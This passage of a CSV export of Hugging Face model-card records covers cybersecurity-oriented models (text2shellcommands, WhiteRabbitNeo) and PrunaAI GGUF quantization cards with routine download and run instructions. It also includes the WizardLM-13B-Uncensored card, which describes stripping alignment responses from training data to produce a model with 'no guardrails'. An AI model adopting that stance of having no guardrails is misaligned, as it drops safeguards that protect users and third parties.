""RepoSibling(rfilename='dataset_loader.py', size=None, blob_id=None, lfs=None)"", ""RepoSibling(rfilename='datasets.yaml', size=None, blob_id=None, lfs=None)"", ""RepoSibling(rfilename='main.py', size=None, blob_id=None, lfs=None)"", ""RepoSibling(rfilename='model..py', size=None, blob_id=None, lfs=None)"", ""RepoSibling(rfilename='requirements.txt', size=None, blob_id=None, lfs=None)"", ""RepoSibling(rfilename='train.py', size=None, blob_id=None, lfs=None)""], ""spaces"": [""Chemically-motivated/RetroHackerTerminalUI""], ""safetensors"": null, ""security_repo_status"": null, ""xet_enabled"": null, ""lastModified"": ""2025-01-01 01:35:47+00:00"", ""cardData"": ""base_model:\n- WhiteRabbitNeo/WhiteRabbitNeo-13B-v1\n- replit/replit-code-v1_5-3b\ndatasets:\n- Canstralian/ShellCommands\n- Canstralian/CyberExploitDB\nlanguage:\n- en\nlibrary_name: transformers\nlicense: mit\ntags:\n- code"", ""transformersInfo"": {""auto_model"": ""AutoModel"", ""custom_class"": null, ""pipeline_tag"": null, ""processor"": null}, ""_id"": ""674b79d91c5984922b542384"", ""modelId"": ""Canstralian/text2shellcommands"", ""usedStorage"": 0}",1,,0,,0,,0,,0,"Chemically-motivated/RetroHackerTerminalUI, huggingface/InferenceSupport/discussions/new?title=Canstralian/text2shellcommands&description=React%20to%20this%20comment%20with%20an%20emoji%20to%20vote%20for%20%5BCanstralian%2Ftext2shellcommands%5D(%2FCanstralian%2Ftext2shellcommands)%20to%20be%20supported%20by%20Inference%20Providers.%0A%0A(optional)%20Which%20providers%20are%20you%20interested%20in%3F%20(Novita%2C%20Hyperbolic%2C%20Together%E2%80%A6)%0A",2
PrunaAI/WhiteRabbitNeo-WhiteRabbitNeo-13B-v1-GGUF-smashed,"---
thumbnail: ""https://assets-global.website-files.com/646b351987a8d8ce158d1940/64ec9e96b4334c0e1ac41504_Logo%20with%20white%20text.svg""
base_model: WhiteRabbitNeo/WhiteRabbitNeo-13B-v1
metrics:
- memory_disk
- memory_inference
- inference_latency
- inference_throughput
- inference_CO2_emissions
- inference_energy_consumption
tags:
- pruna-ai
---
<!-- header start -->
<!-- 200823 -->
<div style=""width: auto; margin-left: auto; margin-right: auto"">
<a href=""https://www.pruna.ai/"" target=""_blank"" rel=""noopener noreferrer"">
<img src=""https://i.imgur.com/eDAlcgk.png"" alt=""PrunaAI"" style=""width: 100%; min-width: 400px; display: block; margin: auto;"">
</a>
</div>
<!-- header end -->

[](https://twitter.com/PrunaAI)
[](https://github.com/PrunaAI)
[](https://www.linkedin.com/company/93832878/admin/feed/posts/?feedType=following)
[](https://discord.com/invite/vb6SmA3hxu)

## This repo contains GGUF versions of the WhiteRabbitNeo/WhiteRabbitNeo-13B-v1 model.

# Simply make AI models cheaper, smaller, faster, and greener!

- Give a thumbs up if you like this model!
- Contact us and tell us which model to compress next [here](https://www.pruna.ai/contact).
- Request access to easily compress your *own* AI models [here](https://z0halsaff74.typeform.com/pruna-access?typeform-source=www.pruna.ai).
- Read the documentation to learn more [here](https://pruna-ai-pruna.readthedocs-hosted.com/en/latest/).
- Join the Pruna AI community on Discord [here](https://discord.gg/rskEr4BZJx) to share feedback/suggestions or get help.

**Frequently Asked Questions**
- ***How does the compression work?*** The model is compressed with GGUF.
- ***How does the model quality change?*** The quality of the model output might vary compared to the base model.
- ***What is the model format?*** We use the GGUF format.
- ***What calibration data has been used?*** If needed by the compression method, we used WikiText as the calibration data.
- ***How to compress my own models?*** You can request premium access to more compression methods and tech support for your specific use cases [here](https://z0halsaff74.typeform.com/pruna-access?typeform-source=www.pruna.ai).

# Downloading and running the models

You can download the individual files from the Files & versions section. Here is a list of the different versions we provide. For more info, check out [this chart](https://gist.github.com/Artefact2/b5f810600771265fc1e39442288e8ec9) and [this guide](https://www.reddit.com/r/LocalLLaMA/comments/1ba55rj/overview_of_gguf_quantization_methods/):

| Quant type | Description |
|------------|--------------------------------------------------------------------------------------------|
| Q5_K_M | High quality, recommended. |
| Q5_K_S | High quality, recommended. |
| Q4_K_M | Good quality, uses about 4.83 bits per weight, recommended. |
| Q4_K_S | Slightly lower quality with more space savings, recommended. |
| IQ4_NL | Decent quality, slightly smaller than Q4_K_S with similar performance, recommended. |
| IQ4_XS | Decent quality, smaller than Q4_K_S with similar performance, recommended. |
| Q3_K_L | Lower quality but usable, good for low RAM availability. |
| Q3_K_M | Even lower quality. |
| IQ3_M | Medium-low quality, new method with decent performance comparable to Q3_K_M. |
| IQ3_S | Lower quality, new method with decent performance, recommended over Q3_K_S quant, same size with better performance. |
| Q3_K_S | Low quality, not recommended. |
| IQ3_XS | Lower quality, new method with decent performance, slightly better than Q3_K_S. |
| Q2_K | Very low quality but surprisingly usable. |

## How to download GGUF files?

**Note for manual downloaders:** You almost never want to clone the entire repo! Multiple different quantisation formats are provided, and most users only want to pick and download a single file.

The following clients/libraries will automatically download models for you, providing a list of available models to choose from:

* LM Studio
* LoLLMS Web UI
* Faraday.dev

- **Option A** - Downloading in `text-generation-webui`:
- **Step 1**: Under Download Model, you can enter the model repo: WhiteRabbitNeo-WhiteRabbitNeo-13B-v1-GGUF-smashed and below it, a specific filename to download, such as: WhiteRabbitNeo-13B-v1.IQ3_M.gguf.
- **Step 2**: Then click Download.

- **Option B** - Downloading on the command line (including multiple files at once):
- **Step 1**: We recommend using the `huggingface-hub` Python library:
```shell
pip3 install huggingface-hub
```
- **Step 2**: Then you can download any individual model file to the current directory, at high speed, with a command like this:
```shell
huggingface-cli download WhiteRabbitNeo-WhiteRabbitNeo-13B-v1-GGUF-smashed WhiteRabbitNeo-13B-v1.IQ3_M.gguf --local-dir . --local-dir-use-symlinks False
```
<details>
<summary>More advanced huggingface-cli download usage (click to read)</summary>
Alternatively, you can also download multiple files at once with a pattern:

```shell
huggingface-cli download WhiteRabbitNeo-WhiteRabbitNeo-13B-v1-GGUF-smashed --local-dir . --local-dir-use-symlinks False --include='*Q4_K*gguf'
```

For more documentation on downloading with `huggingface-cli`, please see: [HF -> Hub Python Library -> Download files -> Download from the CLI](https://huggingface.co/docs/huggingface_hub/guides/download#download-from-the-cli).
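If you would rather stay in Python, the same single-file download can be done with `hf_hub_download`. A minimal sketch, assuming the filename matches one actually listed under Files & versions:

```python
from huggingface_hub import hf_hub_download

# Download one quant file via the Python API instead of the CLI.
path = hf_hub_download(
    repo_id=""PrunaAI/WhiteRabbitNeo-WhiteRabbitNeo-13B-v1-GGUF-smashed"",
    filename=""WhiteRabbitNeo-13B-v1.IQ3_M.gguf"",  # must exist in the repo
    local_dir=""."",
)
print(path)
```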
To accelerate downloads on fast connections (1Gbit/s or higher), install `hf_transfer`:

```shell
pip3 install hf_transfer
```

And set the environment variable `HF_HUB_ENABLE_HF_TRANSFER` to `1`:

```shell
HF_HUB_ENABLE_HF_TRANSFER=1 huggingface-cli download WhiteRabbitNeo-WhiteRabbitNeo-13B-v1-GGUF-smashed WhiteRabbitNeo-13B-v1.IQ3_M.gguf --local-dir . --local-dir-use-symlinks False
```

Windows Command Line users: You can set the environment variable by running `set HF_HUB_ENABLE_HF_TRANSFER=1` before the download command.
</details>
<!-- README_GGUF.md-how-to-download end -->

<!-- README_GGUF.md-how-to-run start -->

## How to run the model in GGUF format?
- **Option A** - Introductory example with the `llama.cpp` command

Make sure you are using `llama.cpp` from commit [d0cee0d](https://github.com/ggerganov/llama.cpp/commit/d0cee0d36d5be95a0d9088b674dbb27354107221) or later.

```shell
./main -ngl 35 -m WhiteRabbitNeo-13B-v1.IQ3_M.gguf --color -c 32768 --temp 0.7 --repeat_penalty 1.1 -n -1 -p ""<s>[INST] {prompt} [/INST]""
```

Change `-ngl 35` to the number of layers to offload to GPU. Remove it if you don't have GPU acceleration.

Change `-c 32768` to the desired sequence length. For extended sequence models - eg 8K, 16K, 32K - the necessary RoPE scaling parameters are read from the GGUF file and set by llama.cpp automatically. Note that longer sequence lengths require much more resources, so you may need to reduce this value.

If you want to have a chat-style conversation, replace the `-p <PROMPT>` argument with `-i -ins`.

For other parameters and how to use them, please refer to [the llama.cpp documentation](https://github.com/ggerganov/llama.cpp/blob/master/examples/main/README.md).

- **Option B** - Running in `text-generation-webui`

Further instructions can be found in the text-generation-webui documentation, here: [text-generation-webui/docs/04 ‐ Model Tab.md](https://github.com/oobabooga/text-generation-webui/blob/main/docs/04%20-%20Model%20Tab.md#llamacpp).

- **Option C** - Running from Python code

You can use GGUF models from Python using the [llama-cpp-python](https://github.com/abetlen/llama-cpp-python) or [ctransformers](https://github.com/marella/ctransformers) libraries. Note that at the time of writing (Nov 27th 2023), ctransformers has not been updated for some time and is not compatible with some recent models. Therefore I recommend you use llama-cpp-python.

### How to load this model in Python code, using llama-cpp-python

For full documentation, please see: [llama-cpp-python docs](https://abetlen.github.io/llama-cpp-python/).

#### First install the package

Run one of the following commands, according to your system:

```shell
# Base llama-cpp-python with no GPU acceleration
pip install llama-cpp-python
# With NVidia CUDA acceleration
CMAKE_ARGS=""-DLLAMA_CUBLAS=on"" pip install llama-cpp-python
# Or with OpenBLAS acceleration
CMAKE_ARGS=""-DLLAMA_BLAS=ON -DLLAMA_BLAS_VENDOR=OpenBLAS"" pip install llama-cpp-python
# Or with CLBLast acceleration
CMAKE_ARGS=""-DLLAMA_CLBLAST=on"" pip install llama-cpp-python
# Or with AMD ROCm GPU acceleration (Linux only)
CMAKE_ARGS=""-DLLAMA_HIPBLAS=on"" pip install llama-cpp-python
# Or with Metal GPU acceleration for macOS systems only
CMAKE_ARGS=""-DLLAMA_METAL=on"" pip install llama-cpp-python

# On Windows, to set the CMAKE_ARGS variable in PowerShell, follow this format; eg for NVidia CUDA:
$env:CMAKE_ARGS = ""-DLLAMA_CUBLAS=on""
pip install llama-cpp-python
```

#### Simple llama-cpp-python example code

```python
from llama_cpp import Llama

# Set n_gpu_layers to the number of layers to offload to GPU. Set to 0 if no GPU acceleration is available on your system.
llm = Llama(
  model_path=""./WhiteRabbitNeo-13B-v1.IQ3_M.gguf"",  # Download the model file first
  n_ctx=32768,  # The max sequence length to use - note that longer sequence lengths require much more resources
  n_threads=8,  # The number of CPU threads to use, tailor to your system and the resulting performance
  n_gpu_layers=35  # The number of layers to offload to GPU, if you have GPU acceleration available
)

# Simple inference example
output = llm(
  ""<s>[INST] {prompt} [/INST]"",  # Prompt
  max_tokens=512,  # Generate up to 512 tokens
  stop=[""</s>""],  # Example stop token - not necessarily correct for this specific model! Please check before using.
  echo=True  # Whether to echo the prompt
)

# Chat Completion API

llm = Llama(model_path=""./WhiteRabbitNeo-13B-v1.IQ3_M.gguf"", chat_format=""llama-2"")  # Set chat_format according to the model you are using
llm.create_chat_completion(
    messages = [
        {""role"": ""system"", ""content"": ""You are a story writing assistant.""},
        {
            ""role"": ""user"",
            ""content"": ""Write a story about llamas.""
        }
    ]
)
```

- **Option D** - Running with LangChain

Here are guides on using llama-cpp-python and ctransformers with LangChain (a short sketch follows the links):

* [LangChain + llama-cpp-python](https://python.langchain.com/docs/integrations/llms/llamacpp)
* [LangChain + ctransformers](https://python.langchain.com/docs/integrations/providers/ctransformers)
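To make Option D concrete, here is a minimal sketch using `langchain-community`'s LlamaCpp wrapper; the parameter values are illustrative, and the path must point at a quant file you downloaded above:

```python
from langchain_community.llms import LlamaCpp

llm = LlamaCpp(
    model_path=""./WhiteRabbitNeo-13B-v1.IQ3_M.gguf"",  # downloaded quant file
    n_ctx=4096,       # assumed context window for this example
    n_gpu_layers=35,  # set to 0 without GPU acceleration
)
print(llm.invoke(""<s>[INST] Summarize what GGUF is in one sentence. [/INST]""))
```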
## Configurations

The configuration info is in `smash_config.json`.

## Credits & License

The license of the smashed model follows the license of the original model. Please check the license of the original model, which provided the base model, before using this model. The license of the `pruna-engine` is [here](https://pypi.org/project/pruna-engine/) on PyPI.

## Want to compress other models?

- Contact us and tell us which model to compress next [here](https://www.pruna.ai/contact).
- Request access to easily compress your own AI models [here](https://z0halsaff74.typeform.com/pruna-access?typeform-source=www.pruna.ai).","{""id"": ""PrunaAI/WhiteRabbitNeo-WhiteRabbitNeo-13B-v1-GGUF-smashed"", ""author"": ""PrunaAI"", ""sha"": ""de9d8c2c01f497e22b16771baec0944f7657ea8a"", ""last_modified"": ""2025-02-19 07:52:12+00:00"", ""created_at"": ""2025-02-19 07:52:08+00:00"", ""private"": false, ""gated"": false, ""disabled"": false, ""downloads"": 0, ""downloads_all_time"": null, ""likes"": 0, ""library_name"": null, ""gguf"": null, ""inference"": null, ""inference_provider_mapping"": null, ""tags"": [""pruna-ai"", ""base_model:WhiteRabbitNeo/WhiteRabbitNeo-13B-v1"", ""base_model:finetune:WhiteRabbitNeo/WhiteRabbitNeo-13B-v1"", ""region:us""], ""pipeline_tag"": null, ""mask_token"": null, ""trending_score"": null, ""card_data"": ""base_model: WhiteRabbitNeo/WhiteRabbitNeo-13B-v1\nmetrics:\n- memory_disk\n- memory_inference\n- inference_latency\n- inference_throughput\n- inference_CO2_emissions\n- inference_energy_consumption\ntags:\n- pruna-ai\nthumbnail: https://assets-global.website-files.com/646b351987a8d8ce158d1940/64ec9e96b4334c0e1ac41504_Logo%20with%20white%20text.svg"", ""widget_data"": null, ""model_index"": null, ""config"": null, ""transformers_info"": null, ""siblings"": [""RepoSibling(rfilename='.gitattributes', size=None, blob_id=None, lfs=None)"", ""RepoSibling(rfilename='README.md', size=None, blob_id=None, lfs=None)""], ""spaces"": [], ""safetensors"": null, ""security_repo_status"": null, ""xet_enabled"": null, ""lastModified"": ""2025-02-19 07:52:12+00:00"", ""cardData"": ""base_model: WhiteRabbitNeo/WhiteRabbitNeo-13B-v1\nmetrics:\n- memory_disk\n- memory_inference\n- inference_latency\n- inference_throughput\n- inference_CO2_emissions\n- inference_energy_consumption\ntags:\n- pruna-ai\nthumbnail: https://assets-global.website-files.com/646b351987a8d8ce158d1940/64ec9e96b4334c0e1ac41504_Logo%20with%20white%20text.svg"", ""transformersInfo"": null, ""_id"": ""67b58da87091b54e2349c595"", ""modelId"": ""PrunaAI/WhiteRabbitNeo-WhiteRabbitNeo-13B-v1-GGUF-smashed"", ""usedStorage"": 0}",1,,0,,0,,0,,0,huggingface/InferenceSupport/discussions/new?title=PrunaAI/WhiteRabbitNeo-WhiteRabbitNeo-13B-v1-GGUF-smashed&description=React%20to%20this%20comment%20with%20an%20emoji%20to%20vote%20for%20%5BPrunaAI%2FWhiteRabbitNeo-WhiteRabbitNeo-13B-v1-GGUF-smashed%5D(%2FPrunaAI%2FWhiteRabbitNeo-WhiteRabbitNeo-13B-v1-GGUF-smashed)%20to%20be%20supported%20by%20Inference%20Providers.%0A%0A(optional)%20Which%20providers%20are%20you%20interested%20in%3F%20(Novita%2C%20Hyperbolic%2C%20Together%E2%80%A6)%0A,1
WizardLM-13B-Uncensored_finetunes_20250425_143346.csv_finetunes_20250425_143346.csv
ADDED
@@ -0,0 +1,239 @@
model_id,card,metadata,depth,children,children_count,adapters,adapters_count,quantized,quantized_count,merges,merges_count,spaces,spaces_count
cognitivecomputations/WizardLM-13B-Uncensored,"---
license: other
datasets:
- ehartford/WizardLM_alpaca_evol_instruct_70k_unfiltered
tags:
- uncensored
---
This is WizardLM trained on a subset of the dataset - responses that contained alignment/moralizing were removed. The intent is to train a WizardLM that doesn't have alignment built in, so that alignment (of any sort) can be added separately, for example with an RLHF LoRA.

Shout out to the open source AI/ML community, and everyone who helped me out.

Note:
An uncensored model has no guardrails.
You are responsible for anything you do with the model, just as you are responsible for anything you do with any dangerous object such as a knife, gun, lighter, or car.
Publishing anything this model generates is the same as publishing it yourself.
You are responsible for the content you publish, and you cannot blame the model any more than you can blame the knife, gun, lighter, or car for what you do with it.","{""id"": ""cognitivecomputations/WizardLM-13B-Uncensored"", ""author"": ""cognitivecomputations"", ""sha"": ""9025c5f96fef9525da9238369ad082961b0e9494"", ""last_modified"": ""2023-05-12 23:08:43+00:00"", ""created_at"": ""2023-05-09 18:56:32+00:00"", ""private"": false, ""gated"": false, ""disabled"": false, ""downloads"": 523, ""downloads_all_time"": null, ""likes"": 592, ""library_name"": ""transformers"", ""gguf"": null, ""inference"": null, ""inference_provider_mapping"": null, ""tags"": [""transformers"", ""pytorch"", ""llama"", ""text-generation"", ""uncensored"", ""dataset:ehartford/WizardLM_alpaca_evol_instruct_70k_unfiltered"", ""license:other"", ""autotrain_compatible"", ""text-generation-inference"", ""endpoints_compatible"", ""region:us""], ""pipeline_tag"": ""text-generation"", ""mask_token"": null, ""trending_score"": null, ""card_data"": ""datasets:\n- ehartford/WizardLM_alpaca_evol_instruct_70k_unfiltered\nlicense: other\ntags:\n- uncensored"", ""widget_data"": [{""text"": ""My name is Julien and I like to""}, {""text"": ""I like traveling by train because""}, {""text"": ""Paris is an amazing place to visit,""}, {""text"": ""Once upon a time,""}], ""model_index"": null, ""config"": {""architectures"": [""LlamaForCausalLM""], ""model_type"": ""llama"", ""tokenizer_config"": {""bos_token"": {""__type"": ""AddedToken"", ""content"": ""<s>"", ""lstrip"": false, ""normalized"": true, ""rstrip"": false, ""single_word"": false}, ""eos_token"": {""__type"": ""AddedToken"", ""content"": ""</s>"", ""lstrip"": false, ""normalized"": true, ""rstrip"": false, ""single_word"": false}, ""pad_token"": null, ""unk_token"": {""__type"": ""AddedToken"", ""content"": ""<unk>"", ""lstrip"": false, ""normalized"": true, ""rstrip"": false, ""single_word"": false}}}, ""transformers_info"": {""auto_model"": ""AutoModelForCausalLM"", ""custom_class"": null, ""pipeline_tag"": ""text-generation"", ""processor"": ""AutoTokenizer""}, ""siblings"": [""RepoSibling(rfilename='.gitattributes', size=None, blob_id=None, lfs=None)"", ""RepoSibling(rfilename='README.md', size=None, blob_id=None, lfs=None)"", ""RepoSibling(rfilename='added_tokens.json', size=None, blob_id=None, lfs=None)"", ""RepoSibling(rfilename='config.json', size=None, blob_id=None, lfs=None)"", ""RepoSibling(rfilename='generation_config.json', size=None, blob_id=None, lfs=None)"", ""RepoSibling(rfilename='pytorch_model.bin', size=None, blob_id=None, lfs=None)"", ""RepoSibling(rfilename='special_tokens_map.json', size=None, blob_id=None, lfs=None)"", ""RepoSibling(rfilename='tokenizer.json', size=None, blob_id=None, lfs=None)"", ""RepoSibling(rfilename='tokenizer.model', size=None, blob_id=None, lfs=None)"", ""RepoSibling(rfilename='tokenizer_config.json', size=None, blob_id=None, lfs=None)"", ""RepoSibling(rfilename='training_args.bin', size=None, blob_id=None, lfs=None)""], ""spaces"": [""h2oai/h2ogpt-chatbot"", ""eduagarcia/open_pt_llm_leaderboard"", ""h2oai/h2ogpt-chatbot2"", ""Intel/low_bit_open_llm_leaderboard"", ""BAAI/open_cn_llm_leaderboard"", ""gsaivinay/open_llm_leaderboard"", ""GTBench/GTBench"", ""Vikhrmodels/small-shlepa-lb"", ""Oddity/ehartford-WizardLM-13B-Uncensored"", ""sawblade/ehartford-WizardLM-13B-Uncensored"", ""kz-transformers/kaz-llm-lb"", ""felixz/open_llm_leaderboard"", ""TRaw/ehartford-WizardLM-13B-Uncensored"", 
""OPTML-Group/UnlearnCanvas-Benchmark"", ""BAAI/open_flageval_vlm_leaderboard"", ""b1sheng/kg_llm_leaderboard_test"", ""neubla/neubla-llm-evaluation-board"", ""lapsapking/h2ogpt-chatbot"", ""nuwa/ehartford-WizardLM-13B-Uncensored"", ""upashu/ehartford-WizardLM-13B-Uncensored"", ""0xeureka/ehartford-WizardLM-13B-Uncensored"", ""cownclown/ehartford-WizardLM-13B-Uncensored-v2"", ""rodrigomasini/data_only_open_llm_leaderboard"", ""Docfile/open_llm_leaderboard"", ""his0/h2ogpt-chatbot"", ""atimughal662/InfoFusion"", ""satan4191/ehartford-WizardLM-13B-Uncensored"", ""Jacob209/ehartford-WizardLM-13B-Uncensored"", ""dorkai/SinGPT-Small"", ""234bcn/ehartford-WizardLM-13B-Uncensored"", ""sssdtgvg/ehartford-WizardLM-13B-Uncensored"", ""pmb99/ehartford-WizardLM-13B-Uncensored"", ""Myaptla/ehartford-WizardLM-13B-Uncensored"", ""Testrnfjfjfrj/ehartford-WizardLM-13B-Uncensored"", ""arcaha/ehartford-WizardLM-13B-Uncensored"", ""Findinme/ehartford-WizardLM-13B-Uncensored"", ""JustMe4Real/ehartford-WizardLM-13B-Uncensored"", ""Andrezz/ehartford-WizardLM-13B-Uncensored"", ""akashkj/H2OGPT"", ""bscrivener/ehartford-WizardLM-13B-Uncensored-dupe"", ""Vinnybustacap/ehartford-WizardLM-13B-Uncensored"", ""asach/ehartford-WizardLM-13B-Uncensored"", ""Fscott8/ehartford-WizardLM-13B-Uncensored"", ""tyy130/ehartford-WizardLM-13B-Uncensored"", ""rahduke/ehartford-WizardLM-13B-Uncensored"", ""ghufran919/ehartford-WizardLM-13B-Uncensored"", ""ryanmacri/ehartford-WizardLM-13B-Uncensored"", ""ariel0330/h2osiri"", ""elitecode/h2ogpt-chatbot2"", ""Lordsony/ehartford-WizardLM-13B-Uncensored"", ""t0int/ehartford-WizardLM-13B-Uncensored"", ""ccoreilly/aigua-xat"", ""Sambhavnoobcoder/h2ogpt-chatbot"", ""Nexe/ehartford-WizardLM-13B-Uncensored"", ""k4b00m/ehartford-WizardLM-13B-Uncensored"", ""hdhdhsnah/ehartford-WizardLM-13B-Uncensored"", ""Riottt/13b"", ""asd123123asd/ehartford-WizardLM-13B-Uncensored"", ""Wisjdkwidndj/ehartford-WizardLM-13B-Uncensored"", ""intellecttech/ehartford-WizardLM-13B-Uncensored"", ""markendsley/ehartford-WizardLM-13B-Uncensored2"", ""bigraj/ehartford-WizardLM-13B-Uncensored"", ""zenonx/ehartford-WizardLM-13B-Uncensored3"", ""krisskross43/ehartford-WizardLM-13B-Uncensored"", ""antilopa/ehartford-WizardLM-13B-Uncensored"", ""girit/Proof-Read-Uncensored"", ""jimjonesbabyfreshout/ehartford-WizardLM-13B-Uncensored"", ""SorcererSupreme/cognitivecomputations-WizardLM-13B-Uncensored"", ""ssinss93/ehartford-WizardLM-13B-Uncensored"", ""herobrian389/ehartford-WizardLM-13B-Uncensored"", ""Unknown4321/Gratify"", ""SamGro/cognitivecomputations-WizardLM-13B-Uncensored"", ""TonyAdams/cognitivecomputations-WizardLM-13B-Uncensored"", ""JeremGaming/cognitivecomputations-WizardLM-13B-Uncensored"", ""Kiadee/cognitivecomputations-WizardLM-13B-Uncensored"", ""kapilyadav/cognitivecomputations-WizardLM-13B-Uncensored"", ""frenzen/cognitivecomputations-WizardLM-13B-Uncensored"", ""juanenrique/cognitivecomputations-WizardLM-13B-Uncensored"", ""virtuehearts/ehartford-WizardLM-13B-Uncensored"", ""gunnit/ehartford-WizardLM-13B-Uncensored"", ""smothiki/open_llm_leaderboard"", ""pngwn/open_llm_leaderboard"", ""winterwebs/cognitivecomputations-WizardLM-13B-Uncensored"", ""Kiadee/WizardLM-13B-Uncensored"", ""Illuminum/cognitivecomputations-WizardLM-13B-Uncensored"", ""pngwn/open_llm_leaderboard_two"", ""iblfe/test"", ""mithroi/ehartford-WizardLM-13B-Uncensored"", ""McletsHacks/cognitivecomputations-WizardLM-13B-Uncensored"", ""willk/ehartford-WizardLM-13B-Uncensored"", ""AnonymousSub/Ayurveda_Chatbot"", 
""Viperissleepy/cognitivecomputations-WizardLM-13B-Uncensored"", ""K00B404/Research-chatbot"", ""Sunrusojsis/llama-hf-7b-chat"", ""0x1668/open_llm_leaderboard"", ""pngwn/open_llm_leaderboard-check"", ""ianott/ehartford-WizardLM-13B-Uncensored"", ""Heem954/cognitivecomputations-WizardLM-13B-Uncensored"", ""nopesirnope/ehartford-WizardLM-13B-Uncensored"", ""swaichsaheb/ehartford-WizardLM-13B-Uncensored""], ""safetensors"": null, ""security_repo_status"": null, ""xet_enabled"": null, ""lastModified"": ""2023-05-12 23:08:43+00:00"", ""cardData"": ""datasets:\n- ehartford/WizardLM_alpaca_evol_instruct_70k_unfiltered\nlicense: other\ntags:\n- uncensored"", ""transformersInfo"": {""auto_model"": ""AutoModelForCausalLM"", ""custom_class"": null, ""pipeline_tag"": ""text-generation"", ""processor"": ""AutoTokenizer""}, ""_id"": ""645a9760e505443f81956d37"", ""modelId"": ""cognitivecomputations/WizardLM-13B-Uncensored"", ""usedStorage"": 52064191977}",0,https://huggingface.co/PrunaAI/cognitivecomputations-WizardLM-13B-Uncensored-GGUF-smashed,1,,0,"https://huggingface.co/TheBloke/WizardLM-13B-Uncensored-GGUF, https://huggingface.co/TheBloke/WizardLM-13B-Uncensored-AWQ, https://huggingface.co/Ffftdtd5dtft/WizardLM-13B-Uncensored-Q2_K-GGUF, https://huggingface.co/height229/WizardLM-13B-Uncensored-Q4_K_M-GGUF, https://huggingface.co/toni3000/WizardLM-13B-Uncensored-Q4_K_M-GGUF, https://huggingface.co/mradermacher/WizardLM-13B-Uncensored-GGUF, https://huggingface.co/mradermacher/WizardLM-13B-Uncensored-i1-GGUF, https://huggingface.co/FaolanKusibo/WizardLM-13B-Uncensored-Q4_K_M-GGUF",8,,0,"BAAI/open_cn_llm_leaderboard, BAAI/open_flageval_vlm_leaderboard, GTBench/GTBench, Intel/low_bit_open_llm_leaderboard, OPTML-Group/UnlearnCanvas-Benchmark, Vikhrmodels/small-shlepa-lb, eduagarcia/open_pt_llm_leaderboard, h2oai/h2ogpt-chatbot, h2oai/h2ogpt-chatbot2, huggingface/InferenceSupport/discussions/new?title=cognitivecomputations/WizardLM-13B-Uncensored&description=React%20to%20this%20comment%20with%20an%20emoji%20to%20vote%20for%20%5Bcognitivecomputations%2FWizardLM-13B-Uncensored%5D(%2Fcognitivecomputations%2FWizardLM-13B-Uncensored)%20to%20be%20supported%20by%20Inference%20Providers.%0A%0A(optional)%20Which%20providers%20are%20you%20interested%20in%3F%20(Novita%2C%20Hyperbolic%2C%20Together%E2%80%A6)%0A, jimjonesbabyfreshout/ehartford-WizardLM-13B-Uncensored, lapsapking/h2ogpt-chatbot, sawblade/ehartford-WizardLM-13B-Uncensored",13
PrunaAI/cognitivecomputations-WizardLM-13B-Uncensored-GGUF-smashed,"---
thumbnail: ""https://assets-global.website-files.com/646b351987a8d8ce158d1940/64ec9e96b4334c0e1ac41504_Logo%20with%20white%20text.svg""
base_model: cognitivecomputations/WizardLM-13B-Uncensored
metrics:
- memory_disk
- memory_inference
- inference_latency
- inference_throughput
- inference_CO2_emissions
- inference_energy_consumption
tags:
- pruna-ai
---
<!-- header start -->
<!-- 200823 -->
<div style=""width: auto; margin-left: auto; margin-right: auto"">
<a href=""https://www.pruna.ai/"" target=""_blank"" rel=""noopener noreferrer"">
<img src=""https://i.imgur.com/eDAlcgk.png"" alt=""PrunaAI"" style=""width: 100%; min-width: 400px; display: block; margin: auto;"">
</a>
</div>
<!-- header end -->

[](https://twitter.com/PrunaAI)
[](https://github.com/PrunaAI)
[](https://www.linkedin.com/company/93832878/admin/feed/posts/?feedType=following)
[](https://discord.com/invite/vb6SmA3hxu)

## This repo contains GGUF versions of the cognitivecomputations/WizardLM-13B-Uncensored model.

# Simply make AI models cheaper, smaller, faster, and greener!

- Give a thumbs up if you like this model!
- Contact us and tell us which model to compress next [here](https://www.pruna.ai/contact).
- Request access to easily compress your *own* AI models [here](https://z0halsaff74.typeform.com/pruna-access?typeform-source=www.pruna.ai).
- Read the documentation to learn more [here](https://pruna-ai-pruna.readthedocs-hosted.com/en/latest/).
- Join the Pruna AI community on Discord [here](https://discord.gg/rskEr4BZJx) to share feedback/suggestions or get help.

**Frequently Asked Questions**
- ***How does the compression work?*** The model is compressed with GGUF.
- ***How does the model quality change?*** The quality of the model output might vary compared to the base model.
- ***What is the model format?*** We use the GGUF format.
- ***What calibration data has been used?*** If needed by the compression method, we used WikiText as the calibration data.
- ***How to compress my own models?*** You can request premium access to more compression methods and tech support for your specific use cases [here](https://z0halsaff74.typeform.com/pruna-access?typeform-source=www.pruna.ai).

# Downloading and running the models

You can download the individual files from the Files & versions section. Here is a list of the different versions we provide (for a rough size estimate, see the sketch after the table). For more info, check out [this chart](https://gist.github.com/Artefact2/b5f810600771265fc1e39442288e8ec9) and [this guide](https://www.reddit.com/r/LocalLLaMA/comments/1ba55rj/overview_of_gguf_quantization_methods/):

| Quant type | Description |
|------------|--------------------------------------------------------------------------------------------|
| Q5_K_M | High quality, recommended. |
| Q5_K_S | High quality, recommended. |
| Q4_K_M | Good quality, uses about 4.83 bits per weight, recommended. |
| Q4_K_S | Slightly lower quality with more space savings, recommended. |
| IQ4_NL | Decent quality, slightly smaller than Q4_K_S with similar performance, recommended. |
| IQ4_XS | Decent quality, smaller than Q4_K_S with similar performance, recommended. |
| Q3_K_L | Lower quality but usable, good for low RAM availability. |
| Q3_K_M | Even lower quality. |
| IQ3_M | Medium-low quality, new method with decent performance comparable to Q3_K_M. |
| IQ3_S | Lower quality, new method with decent performance, recommended over Q3_K_S quant, same size with better performance. |
| Q3_K_S | Low quality, not recommended. |
| IQ3_XS | Lower quality, new method with decent performance, slightly better than Q3_K_S. |
| Q2_K | Very low quality but surprisingly usable. |
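As referenced above, a back-of-the-envelope size estimate is: file size ≈ parameters × bits-per-weight ÷ 8, ignoring metadata overhead. Using the 4.83 bits/weight quoted for Q4_K_M on a ~13B-parameter model:

```python
# Rough GGUF file-size estimate; metadata overhead is ignored.
params = 13e9            # ~13B parameters
bits_per_weight = 4.83   # Q4_K_M, per the table above
size_gb = params * bits_per_weight / 8 / 1e9
print(f""~{size_gb:.1f} GB"")  # ~7.8 GB
```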
## How to download GGUF files?

**Note for manual downloaders:** You almost never want to clone the entire repo! Multiple different quantisation formats are provided, and most users only want to pick and download a single file.

The following clients/libraries will automatically download models for you, providing a list of available models to choose from:

* LM Studio
* LoLLMS Web UI
* Faraday.dev

- **Option A** - Downloading in `text-generation-webui`:
